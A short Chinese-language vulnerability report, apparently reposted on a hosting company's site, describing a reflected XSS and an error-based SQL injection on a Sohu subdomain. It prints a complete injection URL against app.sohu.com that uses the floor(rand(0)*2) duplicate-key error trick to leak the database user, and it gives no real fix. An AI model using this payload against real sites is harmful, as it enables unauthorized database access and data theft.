鸿 网 互 联 www.68idc.cn

当前位置 : 服务器租用 > 网站安全 > 安全设置 > >

搜狐分站sql注射+反射型xss

来源:互联网 作者:佚名 时间:2015-10-19 08:44
首先是个反射型xss漏洞,结果挖着挖着, 挖出个小清新来!!!数据库报错! 果断上报错语句 就报出来了个美美,然后。。。。。。!!!没有然后了. 先来张反射性的xss的图片个人写真吧 接着是注入 语句的http://app.sohu.com/list_search/0/%2527union+select
首先是个反射型xss漏洞,结果挖着挖着, 挖出个小清新来!!!数据库报错! 果断上报错语句 就报出来了个美美,然后。。。。。。!!!没有然后了.

 
先来张反射性的xss的图片个人写真吧
 
接着是注入 语句的http://app.sohu.com/list_search/0/%2527union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+user()+from+information_schema.tables+limit+0,1))a+from+information_schema.tables+group+by+a)b%2523-1.html 再往下, 我没敢注,少儿不宜! 各位大牛一目了然!

报错注入的图片:

修复方案
 
你懂的
网友评论
<